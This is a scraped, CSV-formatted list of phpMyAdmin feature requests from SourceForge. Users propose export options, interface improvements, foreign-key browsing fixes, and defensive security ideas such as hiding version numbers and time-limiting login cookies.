Original URL https sourceforge.net p phpmyadmin feature requests 409 https sourceforge.net p phpmyadmin feature requests 409 Original author mfichtner","enhancement"
"24444","5109","Allow exporting with UPDATE REPLACE statements.
Having the ability to export with UPDATE statements insead of INSERT would make it easier to upload changes made locally without deleting changes made online.
John me roguetech.org Original URL https sourceforge.net p phpmyadmin feature requests 410 https sourceforge.net p phpmyadmin feature requests 410 Original author anonymous","enhancement"
"24444","5110","Default query.
Instead standart SELECT FROM ... WHERE 1 I suggest to add to config.inc.php new parameter for configure default query string that appear into SQL query textarea.
Thnks Original URL https sourceforge.net p phpmyadmin feature requests 411 https sourceforge.net p phpmyadmin feature requests 411 Original author bdenis","enhancement"
"24444","5111","interface language vs charset.
I have tables in non amp;quot;US English amp;quot; encoding but I want to use English for the interface itself non translated).
interface lang != data lang) Should be no problem to enable other encodings charset) for data when interface is in english.
Thanks in advance.
The simpliest maybe not the rightest) solution is to add more amp;quot;Languge amp;quot;s to the combo \{Eng, enc1\} \{Eng, enc2\} .... ) Original URL https sourceforge.net p phpmyadmin feature requests 412 https sourceforge.net p phpmyadmin feature requests 412 Original author anonymous","enhancement"
"24444","5112","Option for delayed inserts.
When exporting large tables with many rows an option for making the SQL inserts include DELAYED would be much appreciated.
Original URL https sourceforge.net p phpmyadmin feature requests 413 https sourceforge.net p phpmyadmin feature requests 413 Original author anonymous","enhancement"
"24444","5113","Edit multiple records.
One feature which the Usermin MySQL interface has that phpMyAdmin does not and would be very very useful) is the ability to select multiple rows to edit at once.
The Usermin interface gives a set of checkboxes next to each row, and puts an amp;quot;edit amp;quot; button at the bottom of the page to edit all checked rows.
It then brings up a page which basically contains the standard Edit page, but with each row in succession.
Original URL https sourceforge.net p phpmyadmin feature requests 414 https sourceforge.net p phpmyadmin feature requests 414 Original author sourceo","enhancement"
"24444","5114","Automate changing of fields contained in key.
I cannot alter a column from varchar to tinyblob that has an index on it.
The failure below shows that the key length is not specified.
Tinyblob is 255 characters in length.
ALTER TABLE `arc CASE` CHANGE `ncplastname` `ncplastname` TINYBLOB DEFAULT NULL MySQL said 1170 BLOB column ncplastname used in key specification without a key length Original URL https sourceforge.net p phpmyadmin feature requests 415 https sourceforge.net p phpmyadmin feature requests 415 Original author herbr","enhancement"
"24444","5115","preconnect command.
Some providers offer an ssh account, but no external access to their mysql db.
Ssh offers the tunneling feature.
It would be good if such an tunnel could be established by phpmyadmin before any operation on the mysql db.
Original URL https sourceforge.net p phpmyadmin feature requests 416 https sourceforge.net p phpmyadmin feature requests 416 Original author burmagroup","enhancement"
"24444","5116","New table button after dbname in left frame.
when we press on amp;quot;dbname amp;quot; we get to amp;quot;db detail structure.php amp;quot; with a lot of tables shown, and amp;quot;create new table amp;quot; form is in the bottom.
this is slow when mysql load table info from remote slow server.
i suggest by pressing the following [new] can show only the amp;quot; amp;lt;form amp;gt; amp;quot;s which is after amp;lt;hr amp;gt;) without listing tables db struct) in left frame dbname [new] amp;lt; this one, to create new table [ ] table1 [ ] table2 [ ] table3 Original URL https sourceforge.net p phpmyadmin feature requests 417 https sourceforge.net p phpmyadmin feature requests 417 Original author xuefer","enhancement"
"24444","5117","phpmyadmin for sourceforge.
many websites provide phpMyAdmin as a preinstalled service for thier host, so i was thinking, could phpmyadmin use it s phpmyadmin.sf.net host to use cookie based auth for sourceforge project admins that want to work with their mysql databases?
Original URL https sourceforge.net p phpmyadmin feature requests 418 https sourceforge.net p phpmyadmin feature requests 418 Original author phntm","enhancement"
"24444","5118","fully remove version information.
I would like to see an option in the configuration files to fully remove phpMyAdmin and MySQL version information from the GUI and the created exported files.
It is part of my security concept to NOT show anything like that to outside users.
Original URL https sourceforge.net p phpmyadmin feature requests 419 https sourceforge.net p phpmyadmin feature requests 419 Original author floeff","enhancement"
"24444","5119","cfg[ CharEditing ]= textarea for structure edit.
the setting cfg[ CharEditing ]= textarea ; should also be used for editing the structure of a table, regarding the newline issues..
Original URL https sourceforge.net p phpmyadmin feature requests 420 https sourceforge.net p phpmyadmin feature requests 420 Original author blueyed","enhancement"
"24444","5120","Show php code for long queries.
If I export data, there should be a link amp;quot;Show PHP Code amp;quot;, that does not use GET method, like the one in the SQL statement box.. that fails for long inserts.
Original URL https sourceforge.net p phpmyadmin feature requests 421 https sourceforge.net p phpmyadmin feature requests 421 Original author anonymous","enhancement"
"24444","5121","Table list filter.
A way to filter the side table list, for example, on shared hosting you may have table prefixes to specifiy tables for certain projects `projectname table` A way to list just those with `projectname ` would be very handy Original URL https sourceforge.net p phpmyadmin feature requests 422 https sourceforge.net p phpmyadmin feature requests 422 Original author koorb","enhancement"
"24444","5122","Grey out non applicable actions in structure.
In the table structure display In the Field, Type Attributes, ... HTML table It should grey out and maybe not hyperlink) the icons to make a primary key on a field that already had a primary key.
Unique, keys, ... likewise Original URL https sourceforge.net p phpmyadmin feature requests 423 https sourceforge.net p phpmyadmin feature requests 423 Original author fulldecent","enhancement"
"24444","5123","Add Check All UnCheck All in the result view.
When displaying the result on a query, there is no amp;quot;Check All Uncheck All amp;quot; link at the end of the page like the one.
If you want to delete all the records you will have to check all the lines one by one.
This would be usefull and it already exists in the database view).
Original URL https sourceforge.net p phpmyadmin feature requests 424 https sourceforge.net p phpmyadmin feature requests 424 Original author anonymous","enhancement"
"24444","5124","Button option to display all results.
I would love to have a button option to display all results for an SQL query instead of just 30 at a time.
Currently if I want to achieve this, I type the total number of rows returned into the Show rows box and zero into the starting from record box.
Thanks James Original URL https sourceforge.net p phpmyadmin feature requests 425 https sourceforge.net p phpmyadmin feature requests 425 Original author jamesarobertson","enhancement"
"24444","5125","Display total rows returned in Print view .
I would like to see a figure for the toal number of rows returned in the Print view of an SQL query.
[A Print all results button option would be great too see https sourceforge.net tracker index.php?func=detail amp;amp;aid=856499 amp;amp;group id=23067 amp;amp;atid=377411] ].
Cheers James PS.
Thanks for a fantastic, sanity saving product team. )
Original URL https sourceforge.net p phpmyadmin feature requests 426 https sourceforge.net p phpmyadmin feature requests 426 Original author jamesarobertson","enhancement"
"24444","5126","Copy table defaults to structure and data.
I believe it would be best if the Copy table to Operation defaulted to Structure and data , since the result of forgetting to select this option is likely to be far) more severe than the current default Structure only ).
Thanks James Original URL https sourceforge.net p phpmyadmin feature requests 427 https sourceforge.net p phpmyadmin feature requests 427 Original author jamesarobertson","enhancement"
"24444","5127","Make scheduled backup to FTP server.
It would be nice when there was a possibility to make a schedule to backup export) the contents of a database server automatically.
Now I have to remember myself every week, it would be great when I could just give an FTP server server user password) to do this.
Thanks, Roel Original URL https sourceforge.net p phpmyadmin feature requests 428 https sourceforge.net p phpmyadmin feature requests 428 Original author anonymous","enhancement"
"24444","5128","Insert value ranges.
Hello, phpMyAdmin is a terrific program.
However, I realize that it can t cover all cases right away.
Here is one opportunity to alleviate a big problem with a, hopefully, simple addition.
Would you be so kind to add a multiple insert form where it would be possible to set up ranges of data to be inserted and the underlying php code would loop over those ranges and do all the requested inserts?
It s so easy to do in a real language, but not in SQL.
For example I have a table with 18 fields.
I need to add a 1000 records that insert identical values for 4 fields, and increment the primary key.
Right now my only options are to use phpMyAdmin s amp;quot;Insert amp;quot; form to insert each record separately insane in this case) or use python I don t know php, unfortunately) to insert those records using a simple loop.
I can do that easily.
However, other people in my lab can only use phpMyAdmin and they really want to be able to do such additions from phpMyAdmin.
Thank you very much.
Alex.
Original URL https sourceforge.net p phpmyadmin feature requests 429 https sourceforge.net p phpmyadmin feature requests 429 Original author oleksa","enhancement"
"24444","5129","Create new database box only if user can create db.
If cfg[ Servers ][ i][ auth type ] == http and you re logged in.
the Create new database box if filled with the name of your current db.
Original URL https sourceforge.net p phpmyadmin feature requests 430 https sourceforge.net p phpmyadmin feature requests 430 Original author anonymous","enhancement"
"24444","5130","ANSI compatible exports.
A new checkbox amp;quot;ANSI compatible amp;quot; that would have to do at least the following change do not use backslashes to escape a single quote inside strings, but double the quotes.
Needed to import in SQLite.
Original URL https sourceforge.net p phpmyadmin feature requests 432 https sourceforge.net p phpmyadmin feature requests 432 Original author lem9","enhancement"
"24444","5131","Logout button in left frame.
Please add a logout button in the left frame, perhaps next to the Home button.
I have to change users occasionally, and it would be nice to do an immediate logout instead of having to go amp;quot;Home amp;quot; first.
Original URL https sourceforge.net p phpmyadmin feature requests 431 https sourceforge.net p phpmyadmin feature requests 431 Original author tomcollins","enhancement"
"24444","5132","Show column comments while editing.
Hi, Like we all know MySQL supports column comments from the version 4.1.0.
Would it be possible to show these comments in amp;quot;Insert amp;quot; and amp;quot;Edit amp;quot; views if they are available.
Now I see only amp;quot;Field amp;quot;, amp;quot;Type amp;quot;, amp;quot;Null amp;quot; and amp;quot;Value amp;quot; columns in these views.
It would be very informative to save good field descriptions in MySQL tables and show them to user when he she edit table data.
Teemu Original URL https sourceforge.net p phpmyadmin feature requests 434 https sourceforge.net p phpmyadmin feature requests 434 Original author kuulasma","enhancement"
"24444","5133","Import export of meta data relations, MIME, etc.).
Relationship information across tables is a very valuable improvement.
Unfortunately exporting a db and reimporting it in phpMyAdmin seems to miss that info, as it is saved as a bare SQL comment.
Do you think it s possible to retrieve that info when rebuilding a db?
maybe through formats different than SQL, such as LaTex?
thank you Original URL https sourceforge.net p phpmyadmin feature requests 433 https sourceforge.net p phpmyadmin feature requests 433 Original author rcecinati","enhancement"
"24444","5134","Order of exported InnoDb tables should be changed.
At the moment it is not possible to give an InnoDb database directly to another database or server using sql dump.
It is necessary to order the table dumps manually.
It would be nice if the export script can analyse the foreign key dependencies and export the sql dump tables in the right order.
Original URL https sourceforge.net p phpmyadmin feature requests 435 https sourceforge.net p phpmyadmin feature requests 435 Original author toza","enhancement"
"24444","5135","fast server hoping server relation).
most developers used to do 1\.
test on devel sql sever 2\.
update production sql server they switch between these 2 servers frequentlly e.g.
when i m in devel db1.table1 i d like to switch to production db1.table1 as soon as possible.
so i d suggest phpmyadmin add the following configs devel server cfg[ Servers ][ i][ server key ] = devel ; cfg[ Servers ][ i][ relative severs ] = array production = amp;gt; production server ); production cfg[ Servers ][ i][ server key ] = production ; cfg[ Servers ][ i][ relative severs ] = array devel = amp;gt; devel server ); and make links in pages of main frame mostly needed is page of table struct Original URL https sourceforge.net p phpmyadmin feature requests 436 https sourceforge.net p phpmyadmin feature requests 436 Original author xuefer","enhancement"
"24444","5136","able to set text color for each server.
so we won t mess up production devel servers Original URL https sourceforge.net p phpmyadmin feature requests 437 https sourceforge.net p phpmyadmin feature requests 437 Original author xuefer","enhancement"
"24444","5137","Click on row to select.
When clicking on a row, it highlights the row with a different color.
How hard would it be to add the functionality so that when you click on a row, it selects the checkbox for multiple row edit delete on the results page?
Original URL https sourceforge.net p phpmyadmin feature requests 438 https sourceforge.net p phpmyadmin feature requests 438 Original author anonymous","enhancement"
"24444","5138","SQLlite support.
Let s support the SQLlite DB, as it is included in php 5.0 Original URL https sourceforge.net p phpmyadmin feature requests 439 https sourceforge.net p phpmyadmin feature requests 439 Original author anonymous","enhancement"
"24444","5139","Improve browsing foreign windows.
Hi, I am using phpMySQL 2.5.5 on debian linux 3.0 r2), php 4.1.2, MySQL 4.0.16.
Here is some bugs I discovered when I tried to get to know foreign key functionality in phpMyAdmin.
A) In insert view it is difficult to find proper foreign field value using foreing browser because available foreign values are not sorted.
I made a small modifiacation to get foreigners.lib.php file to correct the sorting problem 37c37 lt; .
foreign display == FALSE) ?
ORDER BY .
PMA backquote foreign table) .
.
.
PMA backquote foreign display)) gt; .
ORDER BY .
PMA backquote foreign table) .
.
.
PMA backquote foreign field) B) I think that foreign broser window should be a little bit wider.
My browser Mozilla 1.5) shows the scrollbar on the bottom of the windows because the content is wider than the browser window.
C) Paging do not work.
I can see first 200 ?)
foreign values on the first page but if I try to choose the second page I see the following error message.
Show all button works correctly Warning Supplied argument is not a valid MySQL result resource in opt phpMyAdmin255 libraries mysql wrappers.lib.php on line 36 Warning Invalid argument supplied for foreach ) in opt phpMyAdmin255 libraries relation.lib.php on line 311 D) I do not understand the meaning of the all columns in foreing browser .
Why Keyname and Description columns are displaied twice on table header Keyname , Description , Show all Page selector, Description , Keyname ) F) If RepeatCells in config.inc.php is set to 0 table header is repeated after every third row.
0 should disable table header from repeating... PS I am using InnoDB foreign keys instead of phpMyAdmin relations if it make difference Teemu Original URL https sourceforge.net p phpmyadmin feature requests 440 https sourceforge.net p phpmyadmin feature requests 440 Original author kuulasma","enhancement"
"24444","5140","Filter db structure on group of nested tables.
When the user clicks on the common name of a group of nested tables in the left frame, the right frame displays the structure of the entire database that contains this group of nested tables.
IMO it would be useful if db details structure.php could be modified so that in this scenario it only displays information about the tables that belong to the group the user clicked on.
Original URL https sourceforge.net p phpmyadmin feature requests 442 https sourceforge.net p phpmyadmin feature requests 442 Original author mfichtner","enhancement"
"24444","5141","New database on databases screen.
When I started using phpMyAdmin, I couldn t find the new database option, so I just raw MySQL to create a database.
Now I know where that option is, but I think it s in the wrong place.
The new user option is also in the users rights screen.
So why is the new database option not in the databases screen?
Original URL https sourceforge.net p phpmyadmin feature requests 441 https sourceforge.net p phpmyadmin feature requests 441 Original author olafvdspek","enhancement"
"24444","5142","Optional CVS tags or comments) in .sql export.
Time to time I m exporting database structure to an sql file, and place it in cvs repository.
Each time after exporting I must open the exported file and add the Id tag before commiting.
I assume this wouldn t be time consuming to add an option, which would allow to append CVS tags to script file header comment?
Or maybe even custom comment lines, where I could add my Id and Author lines?
Original URL https sourceforge.net p phpmyadmin feature requests 444 https sourceforge.net p phpmyadmin feature requests 444 Original author anonymous","enhancement"
"24444","5143","Browse foreign keys window search.
We could use the upper central part of the browse window to add an Description input field and a Search button.
This would do a LIKE search and show only the relevant rows.
Original URL https sourceforge.net p phpmyadmin feature requests 443 https sourceforge.net p phpmyadmin feature requests 443 Original author lem9","enhancement"
"24444","5144","Copy a MySQL database.
It would be handy a function to duplicate an existing database with a different name), with the option to copy structure only, or structure and data.
Original URL https sourceforge.net p phpmyadmin feature requests 445 https sourceforge.net p phpmyadmin feature requests 445 Original author anonymous","enhancement"
"24444","5145","Compare MySQL databases.
A function to compare two databases and report differences at least in the structure), with may be the option to add remove differences between them.
It might be able to compare two databases, or a database with an exported file, or two exported files.
Original URL https sourceforge.net p phpmyadmin feature requests 446 https sourceforge.net p phpmyadmin feature requests 446 Original author anonymous","enhancement"
"24444","5146","Change host through web.
Is there a possibility to change the host MySQL Server) while using the program?
I want to be able to change it to every host, not only the pre configured in config.inc.php If this is not possible gt; feature request Original URL https sourceforge.net p phpmyadmin feature requests 447 https sourceforge.net p phpmyadmin feature requests 447 Original author anonymous","enhancement"
"24444","5147","FK relation popup DHTML window based on multiple fields.
I would like to see a FK popup DHTML window appear onmouseover FK event.
The DHTML window contents will be defined in the Relation View page.
Instead of a drop down Choose Field To Display.
Have either 1) Text box which you can enter a query for the FK lookup.
OR 2) Multiple text boxes to select more than one field.
Example 1) SELECT CONCAT first name, last name) as Name FROM contact tbl WHERE contact id= id ORDER BY Name The id would be replaced with the FK id.
OR Example 2) DropDown1, DropDown2, DropDown3... etc.
Original URL https sourceforge.net p phpmyadmin feature requests 448 https sourceforge.net p phpmyadmin feature requests 448 Original author agape logos","enhancement"
"24444","5148","Allowing Command Line input.
It might be an idea if the Export script was altered to use some other coding for delimiting sections rather than This causes the generated .sql files to fail on import via mysql DB lt; FILE from the command line.
As soon as they re removed, it works again.
Original URL https sourceforge.net p phpmyadmin feature requests 449 https sourceforge.net p phpmyadmin feature requests 449 Original author anonymous","enhancement"
"24444","5149","Edit next record.
I d like an option to go to the next register after editing the current one, for not having to click again in the edit button in the browse tab, it is useful when correcting errors in entries that are not the same in every register, but are in every of them.
thanks loluengo vtr.net Original URL https sourceforge.net p phpmyadmin feature requests 450 https sourceforge.net p phpmyadmin feature requests 450 Original author anonymous","enhancement"
"24444","5150","textarea for column comments.
My suggestion is to replace text box with textarea in relation view.
Now lt;input type= text name= comment[ lt;?php echo field; ?
gt;] value= lt;?php echo isset comments[ field]) ?
htmlspecialchars comments[ field]) ); ?
gt; gt; New lt;textarea rows= 3 cols= 80 name= comment[ lt;?php echo field; ?
gt;] gt; lt;?php echo isset comments[ field]) ?
htmlspecialchars comments[ field]) ); ?
gt; lt; textarea gt; Original URL https sourceforge.net p phpmyadmin feature requests 451 https sourceforge.net p phpmyadmin feature requests 451 Original author j georg","enhancement"
"24444","5151","Pop up calendar next to date fields.
It would be cool if there were an icon next to date fields that popped up a calendar to choose a date from.
And example is here http www.ticketmakers.com tmJLShowings.dll zipsearch?choice=theater theaterid=30002 date=today TBP=30000 Click the small icon on the left to see the calendar.
Original URL https sourceforge.net p phpmyadmin feature requests 452 https sourceforge.net p phpmyadmin feature requests 452 Original author anonymous","enhancement"
"24444","5152","Stay here after editing.
The edit row form has 2 and options Go back to previous page Or Insert another new row I d like a 3rd stay here Why I use phpmyadmin to edit the content of my website... this update option would fit my tweak check editing style.
Original URL https sourceforge.net p phpmyadmin feature requests 454 https sourceforge.net p phpmyadmin feature requests 454 Original author bkdotcom","enhancement"
"24444","5153","Virtual Tables Views).
can we store a request as an object of the database or a table like so that we can use it like a table in other request or just to browse it ?
they will appear with a different icon than table in the left part under the table s list but they are treated like read only table no insert no update just select from them) or just store the request to execute them only to avoid to upload them from the local disk why put a little table s icon before the table if the list is only a list of table s name ?
i m sorry for my english, did you understand what i mean ?
aurelien.c free.fr Original URL https sourceforge.net p phpmyadmin feature requests 453 https sourceforge.net p phpmyadmin feature requests 453 Original author anonymous","enhancement"
"24444","5154","Export selected fields only.
Would be nice if we could export data and structure for selected fields only.
Original URL https sourceforge.net p phpmyadmin feature requests 457 https sourceforge.net p phpmyadmin feature requests 457 Original author vanowm","enhancement"
"24444","5155","Show suggested solutions when can t connect.
I just went through some problems getting PMA set up.
Basically it amounted to not having the PMA user set up properly in MySQL.
What I d like to see is when pma localhost or whatever) can t connect is a brief page of suggested actions.
For instance Couldn t connect to get server information.
You may need to Set the PMA password SET PASSWORD FOR pma localhost = ...) or Grant privileges to the PMA user [SQL for granting access] Either action will require accessing the MySQL server directly with high enough permissions.
This way I can just copy and paste the suggested information and send it directly to the server.
Thanks, Michael Original URL https sourceforge.net p phpmyadmin feature requests 455 https sourceforge.net p phpmyadmin feature requests 455 Original author redbeardc","enhancement"
"24444","5156","Trustlogo.
Hi, It should be nice if you can set a config rule to place a trustlogo on phpmyadmin login.
For more information about the trusted third party validation of a website identity function http www.trustlogo.com http www.trustlogo.com ssl certificate support index.html Original URL https sourceforge.net p phpmyadmin feature requests 458 https sourceforge.net p phpmyadmin feature requests 458 Original author vanbroup","enhancement"
"24444","5157","semi )Automatically adding PMA related tables.
In line with my other suggestion for when there are outright errors) I d like to see a configuration page for PMA that either sets up or helps to set up the database tables for the various features of PMA.
For example, I enable bookmarks in config.inc.php but haven t added the appropriate table.
PMA could easily provide the queries needed to generate the table s).
And even execute them.
So... when there are features actived that need tables and the specified tables don t exist PMA would just present the user with some options e.g.
Create table for bookmarks , Show query for creating bookmark table , etc.).
It s nice to have all the queries in the documentation, but why not where it s really useful?
Thanks, Michael Original URL https sourceforge.net p phpmyadmin feature requests 456 https sourceforge.net p phpmyadmin feature requests 456 Original author redbeardc","enhancement"
"24444","5158","Set Alter Collation Settings.
phpMyAdmin resets the default COLLATE set on both table and database, by adding the CHARSET= xxxx without a COLLATE.
This shouldn t be this way, users wanted to use another COLLATE then CHARSETS default can t do that with phpMyAdmin.
USING MySQL 4.1.0 a Original URL https sourceforge.net p phpmyadmin feature requests 459 https sourceforge.net p phpmyadmin feature requests 459 Original author lassehjorth","enhancement"
"24444","5159","BadUsers Config and Auth.
Hi, it would be fine to configure bad users.
Example Hosting for many databases using PhpMyAdmin.
I would like to disable root and some other usernames from login.
I ve done a little patch in an older version, but it would be fine to have it on the official version added to config.inc.php cfg[ badusers ]=array root , xyz ); added to libraries auth cookie.auth.lib.php in function PMA auth check ) foreach cfg[ badusers ] as tmpuser) \{ if pma username== tmpuser) \{ XXTH NO ROOT HERE ;) return FALSE; \} \} I think in array also would work ) Since I only use cookie auth I ve only added it there, but it would be no problem to add it at the other Auth type s).
Thank you for reading ;) th Original URL https sourceforge.net p phpmyadmin feature requests 460 https sourceforge.net p phpmyadmin feature requests 460 Original author bodo bach","enhancement"
"24444","5160","Save as File to Server.
The features on the Export tab work perfectly, but there needs to be another toggle allowing us to save it to the server.
I have many tables that exceed 7MB in size and the server does not have enough memory zipped or gzipped) to download them to my computer.
If it could save to the server perhaps in a backup folder) then it could be a really nice new feature... Sean webmaster baseball almanac.com Original URL https sourceforge.net p phpmyadmin feature requests 461 https sourceforge.net p phpmyadmin feature requests 461 Original author anonymous","enhancement"
"24444","5161","Encrypted password valid for limited time amount.
As it stands, a cookie hijacker can steal the encrypted pass out of the cookie and log into PHPMyAdmin whenever he she wants.
It is also easy for him to be re assured that the user pass is the right one by the username.)
I would suggest encrypting the username to make every user that is logged into the network look the same.
This would also make it imposable to see if root or some other targeted user is logged in at the time.
I would also like to propose a method where a hijacker could only hijack the user pass for a specified period of time.
Lets say three hours... or let the user decide in the config file.)
This will be accomplished by Preparation 1\.
Specify a time variance between clicks.
Log out time delay) Cookie Encoding 1\.
Send a cookie with the Date Time Variance encrypted with the blowfish pass BlowPass) in the config file.
Overwrite the Date Time but NOT the variance.
2\.
Create another pass by combining the Date Time, Variance BlowPass.
md5... maybe) The variance is optional and may only slightly slow a hacker.
3\.
Encrypt the User and Pass with the new DateTimeBlowPass.
4\.
Send the encrypted User and Pass in a cookie.
Authenticating 1\.
Decrypt the Date Time with BlowPass 2\.
If Date Time out of variance, Log Out!
2\.
Use Date Time and BlowPass to recreate DateTimeBlowPass.
3\.
Unencrypt User pass.
4\.
Check if authorized with MySQL.
5\.
Update Date Time cookie with current Date Time.
Wala.
The encrypted pass sent to a users computer is now time sensitive.
If the time variance is out of range, the encrypted pass cannot be used!
This secures the front end without sessions) as much as I can rap my mind around today.
Sending the variance in the cookie is optional.
It may only add a small amount of security.
The idea behind it is that if the hacker has write permissions to the config file, he could change the variance to be huge, allowing him her to use the time sensitive cookie for an extended period of time.
However if the user could write to the config file, he could no doubt create a little program to capture the user pass when they were entered numerous other things.
I would be happy to make these modifications if you would like.
Original URL https sourceforge.net p phpmyadmin feature requests 463 https sourceforge.net p phpmyadmin feature requests 463 Original author knightt","enhancement"
"24444","5162","Multi user upload dir.
Hello, Please let me know how can I remove all .sql files listing in tmp directory from database import section?
I think I should remove something from php code, but i m not sure what exacly.
I have some phpmyadmin users on one server and it is not good that they can see all sql dumps located in tmp.
Original URL https sourceforge.net p phpmyadmin feature requests 464 https sourceforge.net p phpmyadmin feature requests 464 Original author anonymous","enhancement"
"24444","5163","Warning on use of reserved words.
So many new users make the mistake of using a reserved word in creating their tables.
If I had count of the amount of times someone asked me why he can t insert into a field he calls desc or before or anything similar... Possible solution 1) Warning on use of reserved word 2) Renaming field automagically when using reserved word.
1 is best imho) Adding this feature is easy enough, the list of reserved words is obtained here http www.mysql.com doc en Reserved words.html And merely checking if fieldname is in array reserved words); shouldnt take long to execute.
Original URL https sourceforge.net p phpmyadmin feature requests 462 https sourceforge.net p phpmyadmin feature requests 462 Original author ranglefant","enhancement"
"24444","5164","allow css to be cached.
As it stands, browsers may not cash the css files.
In heavy cashing networks because of bandwidth restrictions) the same css code may be applied to the entire document.
Lets say the left bar css code.
I suggest creating different css files for all the areas and cascading them.
There could be one file that is applied to all documents, one just for printing one just for right ect.
ect.
This would also make it a little more simple for people like me to debug as the method you have set up right now is a little out of the ordinary.
Brendan Original URL https sourceforge.net p phpmyadmin feature requests 465 https sourceforge.net p phpmyadmin feature requests 465 Original author knightt","enhancement"
"24444","5165","MySQL alternate upload directory.
The idea being that the interface PHP uploads to directory foo, but the query sent to MySQL references bar.
This allows for chrooted MySQL setups which can be told to load from tmp tempfile even though PHP uploads to the directory chroots mysql tmp Cheers.
stewart PMA nameless uk.com Original URL https sourceforge.net p phpmyadmin feature requests 466 https sourceforge.net p phpmyadmin feature requests 466 Original author anonymous","enhancement"
"24444","5166","Master Maintenence Operations.
You should include the ability to check, anylize, repair, and optimize all of the included databases or at least an entire database.
Original URL https sourceforge.net p phpmyadmin feature requests 468 https sourceforge.net p phpmyadmin feature requests 468 Original author kidmedia","enhancement"
"24444","5167","Replace existing bookmark.
Hi!
The bookmark function is really cool, but it would be cooler if it was possible to exchange a bookmark.
Otherwise it becomes query xyz 1 query xyz 2 query xyz 3 query xyz better query xyz even better query xyz best query xyz best improved query xyz best yet improved .... regards Original URL https sourceforge.net p phpmyadmin feature requests 467 https sourceforge.net p phpmyadmin feature requests 467 Original author anonymous","enhancement"
"24444","5168","Create Php Form Code.
It would be nice if there was a Create php Form Code link as well as the php code.
When making large forms, you would name the form fields the exact same as the db fields.
Then the Create php Form Code link would do the same as the php code link does, except for the values it would list as POST[name], POST [name] ,....).
Or even check boxes next to each table field, then an additional icon next to the drop and change icon for creating the form code based on the selected fields.
I know this would save me hours a week over several projects.
Original URL https sourceforge.net p phpmyadmin feature requests 469 https sourceforge.net p phpmyadmin feature requests 469 Original author cstalvey","enhancement"
"24444","5169","Edit row, save and edit next.
It would be nice to have a new radio button when eidting rows.
With this radio button ative you go to the nextrecord to edit that and you save the row you just have changed.
Original URL https sourceforge.net p phpmyadmin feature requests 470 https sourceforge.net p phpmyadmin feature requests 470 Original author anonymous","enhancement"
"24444","5170","Log SQL statements.
All SQL statements executed by phpmyadmin can be written to a file like a macro recorder.
If one is switching on this function, the statements are traced.
After switching off, the statements can be downloaded to a local file or displayed on screen.
That might be good for changing a local database and syncronizing the live database on the internet afterwards.
Original URL https sourceforge.net p phpmyadmin feature requests 471 https sourceforge.net p phpmyadmin feature requests 471 Original author cmoseler","enhancement"
"24444","5171","Import GZIPed CSV file.
Although it s possible to download a GZIPped version of an export, it s not possible to import a GZIPped text file.
It s a big problem to upload a huge text file to be imported, specially if your connection speed is assymetric.
Thanks.
basssoftware hotmail.com Original URL https sourceforge.net p phpmyadmin feature requests 472 https sourceforge.net p phpmyadmin feature requests 472 Original author anonymous","enhancement"
"24444","5172","Show DBs and Create new .... when I have first page set to server databases.php , there may be show form to create new DB ... as in main.php ...
Original URL https sourceforge.net p phpmyadmin feature requests 473 https sourceforge.net p phpmyadmin feature requests 473 Original author jenix","enhancement"
"24444","5173","Support export with IF NOT EXISTS.
new option checkbox) to add IF NOT EXISTS to sql export string ...
Original URL https sourceforge.net p phpmyadmin feature requests 474 https sourceforge.net p phpmyadmin feature requests 474 Original author jenix","enhancement"
"24444","5174","construction query on count.
In the window of the query, it would be much profit, the automatic construction of query type SELECT field name, Count field name, Count) FROM ` table name` WHERE 1 GROUP BY field name Original URL https sourceforge.net p phpmyadmin feature requests 475 https sourceforge.net p phpmyadmin feature requests 475 Original author anonymous","enhancement"
"24444","5175","Tree view in left panel.
Like phppgadmin, it will be great that phpmyadmin display objects in left pannel with a tree view For example server 1 database 1 tables table 1 table 2 table n views view 1 view 2 stocked procedures procedure 1 procedure 2 database 2 database 3 server 2 etc... with a view to welcome new functionnality of mysql, like stocked procedure in mysql 5 this tree will replace server dropdown list, database dropdown list, and list of database Thanks Julien PACHET Original URL https sourceforge.net p phpmyadmin feature requests 476 https sourceforge.net p phpmyadmin feature requests 476 Original author anonymous","enhancement"
"24444","5176","XML and or Web Service Interface.
I would like to see an xml or soap ish interface to mysql provided by phpmyadmin.
It would then allow desktop applications to be written which could control mysql over http.
Original URL https sourceforge.net p phpmyadmin feature requests 478 https sourceforge.net p phpmyadmin feature requests 478 Original author anonymous","enhancement"
"24444","5177","Import data from files.
Hi, today I found the option to save dumps directly on the server.
Wouldn t it be nice to have the opposite feature too?
Importing a file from the servers harddisk via PMA would be like the import function of mysql, which may be disabled at some servers.
With an integration in PMA, you could use this import.
Original URL https sourceforge.net p phpmyadmin feature requests 477 https sourceforge.net p phpmyadmin feature requests 477 Original author nicohaase","enhancement"
"24444","5178","move Server Settings to single files.
Hi, why not remove DB Server Settings from config.inc.php to f.e.
.
connections myserver.inc.php .
connections mysecondserver.inc.php .
connections [whatever].inc.php this would easier the upgrade process to future versions.
cause you do not have always to re edit the config file Original URL https sourceforge.net p phpmyadmin feature requests 479 https sourceforge.net p phpmyadmin feature requests 479 Original author cybot tm","enhancement"
"24444","5179","displaying hostname on titlebar.
i usually have one installation of phpmyadmin on every server i manage.
when i play with more db at a time, the browser window title help me in the switching beetwen them.
unfortunately, all of the titlebar windows are reporting the same information.
I mean, it displays db.table in execution on localhost.
so if you have 3 or more, it s a pain to switch to the desired window at once.
because i have to look in the address bar of each window.
i advice you to add the hostname on the titlebar.
i.e.
[servername] db.table in execution on localhost.
thanks Original URL https sourceforge.net p phpmyadmin feature requests 480 https sourceforge.net p phpmyadmin feature requests 480 Original author anonymous","enhancement"
"24444","5180","Link for viewing Rows related to current row.
in Browse Table View or in Edit Row View there sh could be a link to view all related Rows from a relationed table!
f.e.
`tab1`.`id` `tab2`.`id` `tab2`.`tab1 id` in Browse View for Table `tab1` you can now easily switch to SELECT FROM `tab2` WHERE `tab1 id` = [SELECTED TAB1 ID] or any other relation defined in the PMA Relation Table a possible way could be, you can select one or more rows with the allready existing checkboxes) and there is an additonal butten below the view, next to Edit and Delete and a selectbox if more then one table is related to this table Original URL https sourceforge.net p phpmyadmin feature requests 481 https sourceforge.net p phpmyadmin feature requests 481 Original author cybot tm","enhancement"
"24444","5181","Change Result Page Selector.
Sorry for my English ;) I have only one small suggest, you could change the page selector on the result or view page.
It s not funny to scroll and click and scroll and click... when you have a big result.
Estimate you have a result with about 30000 rows.
50 Items on each page, makes 600 Pages.
But with your Drop Down Field you only display the first 10\.
I created a selector which displays the first pages, then goes in big steps to the current selected page, but a few pages before and after it changes the step size.
